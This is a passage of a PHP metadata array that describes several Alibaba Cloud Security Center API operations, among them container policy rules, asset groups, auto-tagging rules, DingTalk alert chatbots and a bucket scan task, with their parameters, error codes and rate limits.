['description' => 'The rule ID.'."\n" ."\n" .'> You can call the [ListOpaClusterStrategyNew](~~2623574~~) operation to query the rule ID.'."\n" ."\n" .'> This parameter is invalid when you create a rule.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '16', 'title' => ''], ], [ 'name' => 'StrategyTemplateId', 'in' => 'query', 'schema' => ['description' => 'The ID of the rule template.'."\n" ."\n" .'> You can call the [GetOpaStrategyTemplateSummary](~~2539952~~) operation to query the ID of the rule template.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '109', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The cluster ID.'."\n" ."\n" .'> This parameter is deprecated.', 'type' => 'string', 'required' => false, 'example' => 'cfa7e2fb8c221483ba59e098c34c6****', 'title' => ''], ], [ 'name' => 'StrategyName', 'in' => 'query', 'schema' => ['description' => 'The rule name.', 'type' => 'string', 'required' => false, 'example' => 'default', 'title' => ''], ], [ 'name' => 'Description', 'in' => 'query', 'schema' => ['description' => 'The rule description.', 'type' => 'string', 'required' => false, 'example' => 'default policy', 'title' => ''], ], [ 'name' => 'ClusterName', 'in' => 'query', 'schema' => ['description' => 'The cluster name.'."\n" ."\n" .'> This parameter is deprecated.', 'type' => 'string', 'required' => false, 'example' => '*', 'title' => ''], ], [ 'name' => 'UnScanedImage', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the rule supports unscanned images. Valid values:'."\n" ."\n" .'- **true**'."\n" ."\n" .'- **false**', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'MaliciousImage', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the rule supports malicious Internet images. Valid values:'."\n" ."\n" .'- **true**'."\n" ."\n" .'- **false**', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'ImageName', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The image names.', 'type' => 'array', 'items' => ['description' => 'The image name.'."\n" ."\n" .'> You can call the [GetOpaClusterImageList](~~2539885~~) operation to query the image name.', 'type' => 'string', 'required' => false, 'example' => 'testImage', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'Label', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The container tags.', 'type' => 'array', 'items' => ['description' => 'The container tag.'."\n" ."\n" .'> You can call the [GetOpaClusterLabelList](~~2539885~~) operation to query the container tag.', 'type' => 'string', 'required' => false, 'example' => 'app.kubernetes.io/component:collector', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'RuleAction', 'in' => 'query', 'schema' => ['description' => 'The action that is performed when the rule is hit. Valid values:'."\n" ."\n" .'- **1**: trigger alerts'."\n" ."\n" .'- **2**: block'."\n" ."\n" .'- **3**: allow', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'WhiteList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The whitelist.', 'type' => 'array', 'items' => ['description' => 'The entry in the whitelist.', 'type' => 'string', 'required' => false, 'example' => 'repo-06', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'AlarmDetail', 'in' => 'query', 'style' => 'json', 'schema' => [ 'description' => 'The risks that you want to detect by using the rule.', 'type' => 'object', 'properties' => [ 'Baseline' => [ 'description' => 'The baseline risks.', 'type' => 'object', 'properties' => [ 'RiskLevel' => [ 'description' => 'The risk levels.', 'type' => 'array', 'items' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**'."\n" ."\n" .'- **medium**'."\n" ."\n" .'- **low**', 'type' => 'string', 'required' => false, 'example' => 'high', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], 'Item' => [ 'description' => 'The baseline check items.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the baseline check item.'."\n" ."\n" .'> You can call the [GetOpaClusterBaseLineList](~~2539883~~) operation to query the ID.', 'type' => 'string', 'required' => false, 'example' => 'hc.image.checklist.identify.hc_exploit_couchdb_linux.item', 'title' => ''], 'Name' => ['description' => 'The name of the baseline check item.'."\n" ."\n" .'> You can call the [GetOpaClusterBaseLineList](~~2539883~~) operation to query the name.', 'type' => 'string', 'required' => false, 'example' => 'Unauthorized access to CouchDB configuration risk', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'title' => '', 'example' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], 'Vul' => [ 'description' => 'The vulnerability risks.', 'type' => 'object', 'properties' => [ 'RiskLevel' => [ 'description' => 'The risk levels.', 'type' => 'array', 'items' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**'."\n" ."\n" .'- **medium**'."\n" ."\n" .'- **low**', 'type' => 'string', 'required' => false, 'example' => 'high', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], 'Item' => [ 'description' => 'The vulnerabilities.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the vulnerability.'."\n" ."\n" .'> You can call the [DescribeVulListPage](~~471928~~) operation to query the ID.', 'type' => 'string', 'required' => false, 'example' => 'CVE-2023-36034', 'title' => ''], 'Name' => ['description' => 'The name of the vulnerability.'."\n" ."\n" .'> You can call the [DescribeVulListPage](~~471928~~) operation to query the name.', 'type' => 'string', 'required' => false, 'example' => 'Microsoft Edge vul', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'title' => '', 'example' => '', ], 'RiskClass' => [ 'description' => 'Risk type of vulnerability.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the vulnerability types. Valid values:'."\n" ."\n" .'- **cve**: system vulnerability'."\n" ."\n" .'- **app**: application vulnerability', 'type' => 'string', 'required' => false, 'example' => 'cve', 'title' => ''], 'Name' => ['description' => 'The name of the vulnerability. Valid values:'."\n" ."\n" .'- **system vulnerability**'."\n" ."\n" .'- **application vulnerability**', 'type' => 'string', 'required' => false, 'example' => '系统漏洞', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'title' => '', 'example' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], 'MaliciousFile' => [ 'description' => 'The malicious sample risks.', 'type' => 'object', 'properties' => [ 'RiskLevel' => [ 'description' => 'The risk levels.', 'type' => 'array', 'items' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**'."\n" ."\n" .'- **medium**'."\n" ."\n" .'- **low**', 'type' => 'string', 'required' => false, 'example' => 'high', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], 'Item' => [ 'description' => 'The malicious samples.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the malicious sample.'."\n" ."\n" .'> You can call the [DescribeMatchedMaliciousNames](~~DescribeMatchedMaliciousNames~~) operation to query the ID.', 'type' => 'string', 'required' => false, 'example' => '3685699', 'title' => ''], 'Name' => ['description' => 'The name of the malicious sample.'."\n" ."\n" .'> You can call the [DescribeMatchedMaliciousNames](~~DescribeMatchedMaliciousNames~~) operation to query the name.', 'type' => 'string', 'required' => false, 'example' => 'abnormal binary file', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'title' => '', 'example' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], 'SensitiveFile' => [ 'description' => 'The configuration of sensitive file.', 'type' => 'object', 'properties' => [ 'RiskLevel' => [ 'description' => 'The risk levels.', 'type' => 'array', 'items' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**'."\n" ."\n" .'- **medium**'."\n" ."\n" .'- **low**', 'type' => 'string', 'required' => false, 'example' => 'low', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], 'Item' => [ 'description' => 'The configuration of sensitive file.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the sensitive files.'."\n" ."\n" .'> You can call the [GetSensitiveDefineRuleConfig](~~GetSensitiveDefineRuleConfig~~) operation to query the ID of the malicious sample.', 'type' => 'string', 'required' => false, 'example' => 'key', 'title' => ''], 'Name' => ['description' => 'The name of the sensitive files.'."\n" ."\n" .'> You can call the [GetSensitiveDefineRuleConfig](~~GetSensitiveDefineRuleConfig~~) operation to query the ID of the malicious sample.', 'type' => 'string', 'required' => false, 'example' => 'name', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'title' => '', 'example' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], 'BuildRisk' => [ 'description' => 'The configuration of image build risk.', 'type' => 'object', 'properties' => [ 'RiskLevel' => [ 'description' => 'The risk levels.', 'type' => 'array', 'items' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**'."\n" ."\n" .'- **medium**'."\n" ."\n" .'- **low**', 'type' => 'string', 'required' => false, 'example' => 'low', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], 'Item' => [ 'description' => 'The configuration of image build risk.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the image build risk.'."\n" ."\n" .'> You can call the [ListImageBuildRiskItem](~~ListImageBuildRiskItem~~) operation to query the ID of the malicious sample.', 'type' => 'string', 'required' => false, 'example' => 'key', 'title' => ''], 'Name' => ['description' => 'The name of the image build risk.'."\n" ."\n" .'> You can call the [ListImageBuildRiskItem](~~ListImageBuildRiskItem~~) operation to query the ID of the malicious sample.', 'type' => 'string', 'required' => false, 'example' => 'name', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'title' => '', 'example' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'Scopes', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The application scope of the rule.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'ClusterId' => ['description' => 'The ID of the cluster that is specified in the rule.'."\n" ."\n" .'> You can call the [DescribeGroupedContainerInstances](~~421736~~) operation to query the cluster ID.', 'type' => 'string', 'required' => false, 'example' => 'cc50d***015d2', 'title' => ''], 'AllNamespace' => ['description' => 'Specifies whether to include all namespaces. Valid values:'."\n" ."\n" .'- **1**: includes all namespaces.'."\n" ."\n" .'- **0**: does not include all namespaces.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], 'NamespaceList' => [ 'description' => 'The namespaces.'."\n" ."\n" .'> This parameter is valid only when the AllNamespace parameter is set to 0.', 'type' => 'array', 'items' => ['description' => 'The namespace.'."\n" ."\n" .'> You can call the [GetOpaClusterNamespaceList](~~2539886~~) operation to query the namespace.', 'type' => 'string', 'required' => false, 'example' => 'namespace1', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], 'AckPolicyInstanceId' => ['description' => 'The ID of the cluster node to which the rule is applied.'."\n" ."\n" .'> This parameter is not required when you create the instance.', 'type' => 'string', 'required' => false, 'example' => 'ack-p-1', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'BaseResult', 'description' => 'BaseResult', 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'- **true**'."\n" ."\n" .'- **false**', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.', 'type' => 'string', 'example' => 'success', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => 'CD380235-A0B8-540D-A0D5-D62884469E3C', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'Data' => [ 'description' => 'The IDs of the clusters that failed to be saved.', 'type' => 'array', 'items' => ['description' => 'The ID of the cluster that failed to be saved.', 'type' => 'string', 'example' => '[\'cb8cd***b07ee5\']', 'title' => ''], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"success\\",\\n \\"RequestId\\": \\"CD380235-A0B8-540D-A0D5-D62884469E3C\\",\\n \\"HttpStatusCode\\": 200,\\n \\"Data\\": [\\n \\"[\'cb8cd***b07ee5\']\\"\\n ]\\n}","type":"json"}]', 'title' => 'CreateOpaStrategyNew', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateOpaStrategyNew'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateOpaStrategyNew', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'CreateOrUpdateAssetGroup' => [ 'summary' => 'Modifies the mapping between an asset and an asset group. For example, you can call this operation to modify the server group to which the asset belongs or the asset list of the asset group.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '91931', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server in the server group that you want to create or the server group for which you want to add or remove servers. Separate multiple UUIDs with commas (,).'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to query the UUIDs of servers.'."\n", 'type' => 'string', 'required' => false, 'example' => 'aq12-***,s23***', 'title' => ''], ], [ 'name' => 'GroupName', 'in' => 'query', 'schema' => ['description' => 'The name of the server group that you want to create or the server group for which you want to add or remove a server.'."\n" ."\n" .'> To modify the mapping between a server and a server group, you must provide the name of the server group. You can call the [DescribeAllGroups](~~DescribeAllGroups~~) operation to query the names of server groups. If you do not configure GroupID when you call this operation, a server group is created. In this case, you must configure GroupName.'."\n", 'type' => 'string', 'required' => false, 'example' => 'test', 'maxLength' => 45, 'minLength' => 1, 'title' => ''], ], [ 'name' => 'GroupId', 'in' => 'query', 'schema' => ['description' => 'The ID of the server group for which you want to add to or remove servers.'."\n" ."\n" .'> To modify the mapping between an asset and an asset group, you must provide the ID of the asset group. You can call the [DescribeAllGroups](~~DescribeAllGroups~~) to query the IDs of asset groups. If you do not configure this parameter when you call this operation, an asset group is created.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '55426', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'GroupId' => ['description' => 'The ID of the server group.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '9935302', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'E70074C8-DFB4-44C5-96C7-909DD231D68A', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'GroupNameRepeated', 'errorMessage' => 'group name repeated', 'description' => ''], ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'Service error, please try again later.', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"GroupId\\": 9935302,\\n \\"RequestId\\": \\"E70074C8-DFB4-44C5-96C7-909DD231D68A\\"\\n}","errorExample":""},{"type":"xml","example":"\\n 9935302\\n E70074C8-DFB4-44C5-96C7-909DD231D68A\\n","errorExample":""}]', 'title' => 'CreateOrUpdateAssetGroup', 'description' => 'A server can belong only to one server group. If you call the CreateOrUpdateAssetGroup operation and the server specified in request parameters belongs to Server Group A, the server is removed from Server Group A and then added to the newly created or specified server group after the call is complete.'."\n", 'requestParamsDescription' => 'The following list describes the difference in the configurations of request parameters when you call the CreateOrUpdateAssetGroup operation to create a server group and add servers to or remove servers from a server group:'."\n" ."\n" .'* Create a server group: You do not need to specify **GroupId** but must specify **GroupName**. The **Uuids** parameter is optional.'."\n" .'* Add servers to or remove servers from a server group: You must specify both **GroupId** and **Uuids**. The **GroupName** parameter is optional.'."\n", 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateOrUpdateAssetGroup'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateOrUpdateAssetGroup', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'Group', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:group/*'], ], ], ], ], ], 'CreateOrUpdateAutoTagRule' => [ 'summary' => 'Creates an asset auto-tagging rule or modifies an asset auto-tagging rule that is created on the Asset Management Rule tab.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '91932', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'RuleId', 'in' => 'query', 'schema' => ['description' => 'The ID of the rule.'."\n" ."\n" .'> You can call the [ListAutoTagRules](~~ListAutoTagRules~~) operation to query the ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '300566', 'title' => ''], ], [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['description' => 'The name of the rule.'."\n", 'type' => 'string', 'required' => true, 'example' => 'text-001', 'title' => ''], ], [ 'name' => 'RuleDesc', 'in' => 'query', 'schema' => ['description' => 'The description of the rule.'."\n", 'type' => 'string', 'required' => false, 'example' => 'describe', 'title' => ''], ], [ 'name' => 'Expression', 'in' => 'query', 'schema' => ['description' => 'The expression of the rule.'."\n", 'type' => 'string', 'required' => false, 'example' => '[{"groups":"0","fieldValueType":"string","field":"internetIp","operator":"equals","value":"12.0.0.1"}]', 'title' => ''], ], [ 'name' => 'TagType', 'in' => 'query', 'schema' => ['description' => 'The operation type of the rule. Valid values:'."\n" ."\n" .'* **group**'."\n" .'* **tag**'."\n", 'type' => 'string', 'required' => true, 'example' => 'tag', 'title' => ''], ], [ 'name' => 'TagContext', 'in' => 'query', 'schema' => ['description' => 'The tag specified by the operation type of the rule.'."\n" ."\n" .'* If TagType is set to group, set this parameter to {"groupId":XXX}. XXX specifies the ID of the group. You can call the [DescribeGroupStruct](~~DescribeGroupStruct~~) operation to query the ID.'."\n" .'* If TagType is set to tag, set this parameter to {"tagId":XXX}. XXX specifies the ID of the tag. You can call the [DescribeGroupedTags](~~DescribeGroupedTags~~) operation to query the ID.'."\n", 'type' => 'string', 'required' => false, 'example' => '{"tagId":7804789}', 'title' => ''], ], [ 'name' => 'CheckAll', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to check the rule on the backend. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'false', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '33DCC98C-824D-55D6-8DC5-47F3A71AD867', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => 'Invalid parameter value.', 'description' => 'Invalid parameter.'], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"33DCC98C-824D-55D6-8DC5-47F3A71AD867\\"\\n}","type":"json"}]', 'title' => 'CreateOrUpdateAutoTagRule', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateOrUpdateAutoTagRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateOrUpdateAutoTagRule', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'CreateOrUpdateDingTalk' => [ 'summary' => 'Creates or modifies a DingTalk chatbot that sends notifications.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '91933', 'abilityTreeNodes' => ['FEATUREsasDM8NT3'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the chatbot.'."\n" ."\n" .'> You can call the [DescribeDingTalk](https://www.alibabacloud.com/help/en/security-center/developer-reference/api-sas-2018-12-03-describedingtalk/?spm=a2c63.p38356.0.0.681e4360Qd1eb1) operation to query the IDs of chatbots.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1589', 'title' => ''], ], [ 'name' => 'RuleActionName', 'in' => 'query', 'schema' => ['description' => 'The name of the chatbot.'."\n" ."\n" .'> The name of a chatbot must be 2 to 64 characters in length.'."\n", 'type' => 'string', 'required' => true, 'example' => 'testNotify', 'title' => ''], ], [ 'name' => 'SendUrl', 'in' => 'query', 'schema' => ['description' => 'The webhook URL.'."\n", 'type' => 'string', 'required' => true, 'example' => 'https://oapi.dingtalk.com/robot/send?access_token=XXX', 'title' => ''], ], [ 'name' => 'IntervalTime', 'in' => 'query', 'schema' => ['description' => 'The time interval at which the chatbot sends notifications.'."\n" ."\n" .'> The value **0** indicates unlimited.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'ConfigList', 'in' => 'query', 'schema' => ['description' => 'The alerts for which you want the chatbot to send notifications. The value is a JSON array that contains the following fields:'."\n" ."\n" .'* **type**: the types of alerts. The valid values are listed in the "Additional description of parameters" section in this topic.'."\n" ."\n" .'* **configItemList**: the list of check items. The value is a JSON array that contains the following fields:'."\n" ."\n" .' * **key**: the key of the check item.'."\n" .' * **valueList**: the values of the check item. The value of valueList is a JSON array.'."\n" ."\n" .'> For more information about the value of this parameter, see the "Addition description of parameters" section in this topic.'."\n", 'type' => 'string', 'required' => false, 'example' => '[{"type":"sas_analysis_online-sas-operation-log-sas-event-suspicious","configItemList":[{"key":"item_level","valueList":["all"]},{"key":"event_type","valueList":["all"]}]}]', 'title' => ''], ], [ 'name' => 'GroupIdList', 'in' => 'query', 'schema' => ['description' => 'The IDs of asset groups for which you want the chatbot to send notifications. The value is a JSON array.'."\n" ."\n" .'> You can call the [DescribeGroupStruct](~~DescribeGroupStruct~~) operation to query the IDs of asset groups.'."\n", 'type' => 'string', 'required' => false, 'example' => '["10417151"]', 'title' => ''], ], [ 'name' => 'DingTalkLang', 'in' => 'query', 'schema' => ['description' => 'The language of the notifications. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '76975B7A-34DC-5CB6-9538-91700D4F112E', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'CreateOrUpdateDingTalk', 'requestParamsDescription' => 'Additional description of parameters'."\n" ."\n" .'|||||||'."\n" .'|---|---|---|---|---|---|'."\n" .'|type|Description|key|Description|valueList|Description|'."\n" .'|sas\\_analysis\\_online-sas-operation-log-sas-event-vul|Vulnerabilities|type|Vulnerability type|all|All|'."\n" .'|cms|Web-CMS vulnerability|'."\n" .'|oval|Linux software vulnerability|'."\n" .'|sys|Windows system vulnerability|'."\n" .'|emg|Urgent vulnerability|'."\n" .'|necessity|Risk level|all|All|'."\n" .'|asap|High|'."\n" .'|later|Medium|'."\n" .'|nntf|Low|'."\n" .'|sas\\_analysis\\_online-sas-operation-log-sas-event-hc|Baseline risks|item\\_level|Risk level|all|All|'."\n" .'|high|High|'."\n" .'|medium|Medium|'."\n" .'|low|Low|'."\n" .'|sas\\_analysis\\_online-sas-operation-log-sas-event-suspicious|Alerts|item\\_level|Severity|all|All|'."\n" .'|serious|Critical|'."\n" .'|suspicious|Suspicious|'."\n" .'|remind|Remind|'."\n" .'|event\\_type|Alert type|'."\n" .'|all|All|'."\n" .'|Suspicious process|Suspicious process|'."\n" .'|Webshell|Webshell|'."\n" .'|Unusual logon|Unusual logon|'."\n" .'|Exception|Exception|'."\n" .'|Sensitive file tampering|Sensitive file tampering|'."\n" .'|Malicious process (cloud threat detection)|Malicious process (cloud threat detection)|'."\n" .'|Unusual network connection|Unusual network connection|'."\n" .'|Others|Others|'."\n" .'|Abnormal account|Abnormal account|'."\n" .'|Application intrusion event|Application intrusion event|'."\n" .'|Cloud threat detection|Cloud threat detection|'."\n" .'|Precision defense|Precision defense|'."\n" .'|Application whitelist|Application whitelist|'."\n" .'|Persistent webshell|Persistent webshell|'."\n" .'|sas\\_analysis\\_online-sas-operation-log-sas-event-ak-leakage|AccessKey pair leaks|type|Leak type|all|All|'."\n" .'|sas\\_analysis\\_online-sas-operation-log-sas-event-honeypot|Alerts generated by cloud honeypot|item\\_level|Risk level|all|All|'."\n" .'|high|High|'."\n" .'|medium|Medium|'."\n" .'|low|Low|'."\n" .'|sas\\_analysis\\_online-sas-operation-log-sas-event-rasp|Alerts generated by application protection|item\\_level|Risk level|all|All|'."\n" .'|high|High|'."\n" .'|medium|Medium|'."\n" .'|low|Low|', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateOrUpdateDingTalk'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateOrUpdateDingTalk', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"76975B7A-34DC-5CB6-9538-91700D4F112E\\"\\n}","type":"json"}]', ], 'CreateOssBucketScanTask' => [ 'summary' => 'Creates a bucket check task.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '172804', 'abilityTreeNodes' => ['FEATUREsasNPORLE'], ], 'parameters' => [ [ 'name' => 'BucketNameList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The names of the buckets.'."\n", 'type' => 'array', 'items' => ['description' => 'The name of the bucket.'."\n", 'type' => 'string', 'required' => false, 'example' => 'hz-yqq-standard****', 'title' => ''], 'required' => true, 'maxItems' => 1000, 'title' => '', 'example' => '', ], ], [ 'name' => 'ExcludeKeySuffixList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The suffixes of the objects that you do not want to check.'."\n", 'type' => 'array', 'items' => ['description' => 'The suffix of the object that you do not want to check.'."\n", 'type' => 'string', 'required' => false, 'example' => '.jsp', 'title' => ''], 'required' => false, 'maxItems' => 1000, 'title' => '', 'example' => '', ], ], [ 'name' => 'ScanMode', 'in' => 'query', 